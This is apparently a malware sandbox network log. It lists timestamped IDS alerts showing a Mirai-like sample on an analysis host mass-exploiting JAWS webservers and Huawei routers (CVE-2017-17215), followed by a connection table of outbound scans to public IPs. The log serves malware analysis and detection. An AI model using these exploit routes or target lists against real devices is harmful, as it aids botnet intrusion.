                                              2024-12-13T01:16:01.932778+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233480427.236.21.435501TCP
                                              2024-12-13T01:16:01.932778+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233480427.236.21.435501TCP
                                              2024-12-13T01:16:02.226968+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343584219.211.10.1335501TCP
                                              2024-12-13T01:16:02.226968+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343584219.211.10.1335501TCP
                                              2024-12-13T01:16:02.259241+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23576924.247.26.2535501TCP
                                              2024-12-13T01:16:02.259241+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23576924.247.26.2535501TCP
                                              2024-12-13T01:16:02.274023+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233350239.106.212.1775501TCP
                                              2024-12-13T01:16:02.274023+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233350239.106.212.1775501TCP
                                              2024-12-13T01:16:02.555940+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342540186.71.72.16637215TCP
                                              2024-12-13T01:16:02.570878+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349130186.183.5.18537215TCP
                                              2024-12-13T01:16:02.570941+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358214186.91.18.7937215TCP
                                              2024-12-13T01:16:02.601963+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333458186.227.246.9437215TCP
                                              2024-12-13T01:16:02.711849+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235082241.57.27.11037215TCP
                                              2024-12-13T01:16:02.805928+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233749241.110.61.20837215TCP
                                              2024-12-13T01:16:02.930807+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235235241.86.132.16037215TCP
                                              2024-12-13T01:16:03.180552+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357366223.124.96.7337215TCP
                                              2024-12-13T01:16:03.290152+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347562223.74.119.24537215TCP
                                              2024-12-13T01:16:03.430850+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357990223.236.31.11237215TCP
                                              2024-12-13T01:16:03.555470+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356146105.174.153.17737215TCP
                                              2024-12-13T01:16:03.805260+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353592223.193.21.6937215TCP
                                              2024-12-13T01:16:03.836237+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348740223.165.103.1237215TCP
                                              2024-12-13T01:16:04.586256+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342800186.253.149.14237215TCP
                                              2024-12-13T01:16:04.602329+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359352186.197.11.15837215TCP
                                              2024-12-13T01:16:04.852514+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336898160.87.75.14637215TCP
                                              2024-12-13T01:16:04.926366+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351728221.166.127.2315501TCP
                                              2024-12-13T01:16:04.926366+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351728221.166.127.2315501TCP
                                              2024-12-13T01:16:05.149220+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235061649.89.6.2275501TCP
                                              2024-12-13T01:16:05.149220+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235061649.89.6.2275501TCP
                                              2024-12-13T01:16:05.258186+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353162164.203.129.1605501TCP
                                              2024-12-13T01:16:05.258186+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353162164.203.129.1605501TCP
                                              2024-12-13T01:16:05.846228+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343630186.225.199.5837215TCP
                                              2024-12-13T01:16:06.280283+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233321491.200.146.2035501TCP
                                              2024-12-13T01:16:06.280283+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233321491.200.146.2035501TCP
                                              2024-12-13T01:16:06.400561+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345042160.18.170.5837215TCP
                                              2024-12-13T01:16:06.400561+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354372160.111.63.20837215TCP
                                              2024-12-13T01:16:07.149229+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233907049.18.64.675501TCP
                                              2024-12-13T01:16:07.149229+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233907049.18.64.675501TCP
                                              2024-12-13T01:16:07.164582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354562134.14.51.2555501TCP
                                              2024-12-13T01:16:07.164582+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354562134.14.51.2555501TCP
                                              2024-12-13T01:16:07.430436+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337358198.90.198.325501TCP
                                              2024-12-13T01:16:07.430436+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337358198.90.198.325501TCP
                                              2024-12-13T01:16:07.477616+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346758160.117.179.7037215TCP
                                              2024-12-13T01:16:07.898876+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343712223.122.51.21737215TCP
                                              2024-12-13T01:16:10.805484+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338666156.32.65.14737215TCP
                                              2024-12-13T01:16:10.899425+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357540197.85.88.9037215TCP
                                              2024-12-13T01:16:11.727441+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351750183.24.139.1495501TCP
                                              2024-12-13T01:16:11.727441+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351750183.24.139.1495501TCP
                                              2024-12-13T01:16:11.853000+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350828104.17.4.1345501TCP
                                              2024-12-13T01:16:11.853000+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350828104.17.4.1345501TCP
                                              2024-12-13T01:16:11.853118+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235909214.248.126.155501TCP
                                              2024-12-13T01:16:11.853118+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235909214.248.126.155501TCP
                                              2024-12-13T01:16:11.853134+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235634489.33.108.1925501TCP
                                              2024-12-13T01:16:11.853134+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235634489.33.108.1925501TCP
                                              2024-12-13T01:16:12.727150+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354764182.52.185.2425501TCP
                                              2024-12-13T01:16:12.727150+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354764182.52.185.2425501TCP
                                              2024-12-13T01:16:12.727295+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235798472.164.232.1065501TCP
                                              2024-12-13T01:16:12.727295+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235798472.164.232.1065501TCP
                                              2024-12-13T01:16:12.727321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354322178.253.149.385501TCP
                                              2024-12-13T01:16:12.727321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354322178.253.149.385501TCP
                                              2024-12-13T01:16:12.727454+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342792103.118.67.815501TCP
                                              2024-12-13T01:16:12.727454+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342792103.118.67.815501TCP
                                              2024-12-13T01:16:12.868321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234168899.147.89.945501TCP
                                              2024-12-13T01:16:12.868321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234168899.147.89.945501TCP
                                              2024-12-13T01:16:12.868321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234529637.120.101.1185501TCP
                                              2024-12-13T01:16:12.868321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234529637.120.101.1185501TCP
                                              2024-12-13T01:16:12.883863+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359348182.253.191.1855501TCP
                                              2024-12-13T01:16:12.883863+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359348182.253.191.1855501TCP
                                              2024-12-13T01:16:13.011243+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350456164.60.186.695501TCP
                                              2024-12-13T01:16:13.011243+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350456164.60.186.695501TCP
                                              2024-12-13T01:16:13.011530+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339916110.142.153.1955501TCP
                                              2024-12-13T01:16:13.011530+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339916110.142.153.1955501TCP
                                              2024-12-13T01:16:13.742447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23490544.189.150.535501TCP
                                              2024-12-13T01:16:13.742447+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23490544.189.150.535501TCP
                                              2024-12-13T01:16:13.742557+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334090122.107.195.95501TCP
                                              2024-12-13T01:16:13.742557+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334090122.107.195.95501TCP
                                              2024-12-13T01:16:14.883603+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359144223.221.206.13237215TCP
                                              2024-12-13T01:16:15.024149+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336446181.92.202.20437215TCP
                                              2024-12-13T01:16:15.024266+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344912181.167.20.20337215TCP
                                              2024-12-13T01:16:15.024435+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354804156.58.68.1585501TCP
                                              2024-12-13T01:16:15.024435+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354804156.58.68.1585501TCP
                                              2024-12-13T01:16:15.259142+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338644181.68.125.4837215TCP
                                              2024-12-13T01:16:15.259146+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351616181.119.89.12637215TCP
                                              2024-12-13T01:16:15.477712+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338392181.4.177.12437215TCP
                                              2024-12-13T01:16:15.852972+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348510223.117.32.19537215TCP
                                              2024-12-13T01:16:15.853356+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342750223.134.28.18237215TCP
                                              2024-12-13T01:16:15.879963+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346224186.235.255.24337215TCP
                                              2024-12-13T01:16:16.102763+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334708181.26.51.9937215TCP
                                              2024-12-13T01:16:16.102763+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351690181.2.90.22437215TCP
                                              2024-12-13T01:16:16.102772+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355762181.179.174.25037215TCP
                                              2024-12-13T01:16:16.102772+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334914181.75.52.23437215TCP
                                              2024-12-13T01:16:16.727200+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359802181.62.105.11137215TCP
                                              2024-12-13T01:16:16.806397+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234992841.87.198.11337215TCP
                                              2024-12-13T01:16:16.899827+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350510223.153.7.19537215TCP
                                              2024-12-13T01:16:17.103116+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337906181.159.69.10637215TCP
                                              2024-12-13T01:16:17.696107+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235993041.211.118.11837215TCP
                                              2024-12-13T01:16:17.868131+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356788223.32.162.12837215TCP
                                              2024-12-13T01:16:17.883514+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349902223.42.204.17937215TCP
                                              2024-12-13T01:16:17.883825+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338964223.128.176.7437215TCP
                                              2024-12-13T01:16:17.977929+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339692186.66.4.13437215TCP
                                              2024-12-13T01:16:18.056326+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357784144.67.79.2305501TCP
                                              2024-12-13T01:16:18.056326+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357784144.67.79.2305501TCP
                                              2024-12-13T01:16:18.103066+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352804186.146.179.10037215TCP
                                              2024-12-13T01:16:18.243448+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342530186.228.46.1737215TCP
                                              2024-12-13T01:16:18.353047+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336622186.244.0.16037215TCP
                                              2024-12-13T01:16:18.993454+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351574186.245.43.11937215TCP
                                              2024-12-13T01:16:19.102463+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344616186.138.57.17237215TCP
                                              2024-12-13T01:16:19.150521+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23369661.228.174.1695501TCP
                                              2024-12-13T01:16:19.150521+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23369661.228.174.1695501TCP
                                              2024-12-13T01:16:19.308525+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234091651.96.241.2415501TCP
                                              2024-12-13T01:16:19.308525+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234091651.96.241.2415501TCP
                                              2024-12-13T01:16:20.024685+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234704275.114.97.535501TCP
                                              2024-12-13T01:16:20.024685+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234704275.114.97.535501TCP
                                              2024-12-13T01:16:21.178810+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341594186.42.197.3337215TCP
                                              2024-12-13T01:16:21.180816+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346936102.231.44.6037215TCP
                                              2024-12-13T01:16:21.181454+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360590102.222.174.9237215TCP
                                              2024-12-13T01:16:21.227856+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336544102.201.243.24337215TCP
                                              2024-12-13T01:16:21.290850+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336856102.226.220.23937215TCP
                                              2024-12-13T01:16:22.150125+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360766102.185.95.24137215TCP
                                              2024-12-13T01:16:22.181056+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360742151.1.179.305501TCP
                                              2024-12-13T01:16:22.181056+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360742151.1.179.305501TCP
                                              2024-12-13T01:16:23.010661+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337604105.16.48.6237215TCP
                                              2024-12-13T01:16:23.430850+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344338186.30.58.13237215TCP
                                              2024-12-13T01:16:23.477633+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356724212.22.24.1825501TCP
                                              2024-12-13T01:16:23.477633+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356724212.22.24.1825501TCP
                                              2024-12-13T01:16:24.180801+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357902105.83.142.3137215TCP
                                              2024-12-13T01:16:24.322303+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234091436.168.100.2025501TCP
                                              2024-12-13T01:16:24.322303+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234091436.168.100.2025501TCP
                                              2024-12-13T01:16:25.478131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235713664.151.171.2095501TCP
                                              2024-12-13T01:16:25.478131+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235713664.151.171.2095501TCP
                                              2024-12-13T01:16:25.946812+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353672190.87.89.22337215TCP
                                              2024-12-13T01:16:25.977735+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340898190.102.173.19037215TCP
                                              2024-12-13T01:16:26.180830+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353750105.40.53.1337215TCP
                                              2024-12-13T01:16:26.196459+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344962105.74.116.4937215TCP
                                              2024-12-13T01:16:26.247353+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233722635.230.232.1515501TCP
                                              2024-12-13T01:16:26.247353+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233722635.230.232.1515501TCP
                                              2024-12-13T01:16:26.477778+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341996186.6.43.10437215TCP
                                              2024-12-13T01:16:26.493183+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347124219.160.220.105501TCP
                                              2024-12-13T01:16:26.493183+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347124219.160.220.105501TCP
                                              2024-12-13T01:16:26.617914+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334478186.146.252.1575501TCP
                                              2024-12-13T01:16:26.617914+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334478186.146.252.1575501TCP
                                              2024-12-13T01:16:26.743407+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341556160.101.179.455501TCP
                                              2024-12-13T01:16:26.743407+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341556160.101.179.455501TCP
                                              2024-12-13T01:16:26.743725+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358022111.143.42.1005501TCP
                                              2024-12-13T01:16:26.743725+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358022111.143.42.1005501TCP
                                              2024-12-13T01:16:28.508443+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351666187.21.206.2285501TCP
                                              2024-12-13T01:16:28.508443+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351666187.21.206.2285501TCP
                                              2024-12-13T01:16:28.508614+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360232213.227.27.2545501TCP
                                              2024-12-13T01:16:28.508614+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360232213.227.27.2545501TCP
                                              2024-12-13T01:16:28.524207+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348986171.169.82.2555501TCP
                                              2024-12-13T01:16:28.524207+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348986171.169.82.2555501TCP
                                              2024-12-13T01:16:28.743093+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360892181.138.67.237215TCP
                                              2024-12-13T01:16:28.743227+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356296181.230.50.7137215TCP
                                              2024-12-13T01:16:29.665071+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347800102.252.89.835501TCP
                                              2024-12-13T01:16:29.665071+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347800102.252.89.835501TCP
                                              2024-12-13T01:16:29.680631+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234398481.232.190.1375501TCP
                                              2024-12-13T01:16:29.680631+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234398481.232.190.1375501TCP
                                              2024-12-13T01:16:29.747274+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350238197.253.54.4237215TCP
                                              2024-12-13T01:16:30.102808+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234973636.104.44.1195501TCP
                                              2024-12-13T01:16:30.102808+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234973636.104.44.1195501TCP
                                              2024-12-13T01:16:30.102809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359882107.172.196.2415501TCP
                                              2024-12-13T01:16:30.102809+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359882107.172.196.2415501TCP
                                              2024-12-13T01:16:30.853244+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337098190.183.128.1837215TCP
                                              2024-12-13T01:16:30.900218+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356426190.115.129.9437215TCP
                                              2024-12-13T01:16:31.103083+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233288257.251.167.1715501TCP
                                              2024-12-13T01:16:31.103083+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233288257.251.167.1715501TCP
                                              2024-12-13T01:16:31.186721+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233891623.239.28.245501TCP
                                              2024-12-13T01:16:31.186721+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233891623.239.28.245501TCP
                                              2024-12-13T01:16:31.228077+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235260468.248.30.695501TCP
                                              2024-12-13T01:16:31.228077+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235260468.248.30.695501TCP
                                              2024-12-13T01:16:31.977714+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349320162.66.160.365501TCP
                                              2024-12-13T01:16:31.977714+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349320162.66.160.365501TCP
                                              2024-12-13T01:16:32.274935+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234750880.140.153.2265501TCP
                                              2024-12-13T01:16:32.274935+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234750880.140.153.2265501TCP
                                              2024-12-13T01:16:32.400209+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358230196.131.205.115501TCP
                                              2024-12-13T01:16:32.400209+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358230196.131.205.115501TCP
                                              2024-12-13T01:16:32.538222+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343688125.91.106.1935501TCP
                                              2024-12-13T01:16:32.538222+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343688125.91.106.1935501TCP
                                              2024-12-13T01:16:34.151207+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355182197.172.94.20637215TCP
                                              2024-12-13T01:16:34.401184+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349590156.232.221.8637215TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2024 01:14:16.659854889 CET43928443192.168.2.2391.189.91.42
                                              Dec 13, 2024 01:14:28.510557890 CET4676234241192.168.2.2345.95.168.143
                                              Dec 13, 2024 01:14:28.511657000 CET6524437215192.168.2.23186.19.125.38
                                              Dec 13, 2024 01:14:28.511740923 CET6524437215192.168.2.23186.172.193.38
                                              Dec 13, 2024 01:14:28.511759043 CET6524437215192.168.2.23186.76.46.114
                                              Dec 13, 2024 01:14:28.511770010 CET6524437215192.168.2.23186.116.75.25
                                              Dec 13, 2024 01:14:28.511792898 CET6524437215192.168.2.23186.51.253.131
                                              Dec 13, 2024 01:14:28.511820078 CET6524437215192.168.2.23186.64.147.242
                                              Dec 13, 2024 01:14:28.511838913 CET6524437215192.168.2.23186.68.124.152
                                              Dec 13, 2024 01:14:28.511887074 CET6524437215192.168.2.23186.151.208.186
                                              Dec 13, 2024 01:14:28.511907101 CET6524437215192.168.2.23186.100.204.184
                                              Dec 13, 2024 01:14:28.511924982 CET6524437215192.168.2.23186.16.201.57
                                              Dec 13, 2024 01:14:28.511960030 CET6524437215192.168.2.23186.250.37.101
                                              Dec 13, 2024 01:14:28.512008905 CET6524437215192.168.2.23186.148.129.239
                                              Dec 13, 2024 01:14:28.512012959 CET6524437215192.168.2.23186.209.236.173
                                              Dec 13, 2024 01:14:28.512042999 CET6524437215192.168.2.23186.239.241.54
                                              Dec 13, 2024 01:14:28.512079954 CET6524437215192.168.2.23186.116.36.164
                                              Dec 13, 2024 01:14:28.512101889 CET6524437215192.168.2.23186.212.169.127
                                              Dec 13, 2024 01:14:28.512118101 CET6524437215192.168.2.23186.23.177.218
                                              Dec 13, 2024 01:14:28.512145996 CET6524437215192.168.2.23186.110.138.199
                                              Dec 13, 2024 01:14:28.512176037 CET6524437215192.168.2.23186.126.79.96
                                              Dec 13, 2024 01:14:28.512196064 CET6524437215192.168.2.23186.154.24.140
                                              Dec 13, 2024 01:14:28.512218952 CET6524437215192.168.2.23186.177.11.22
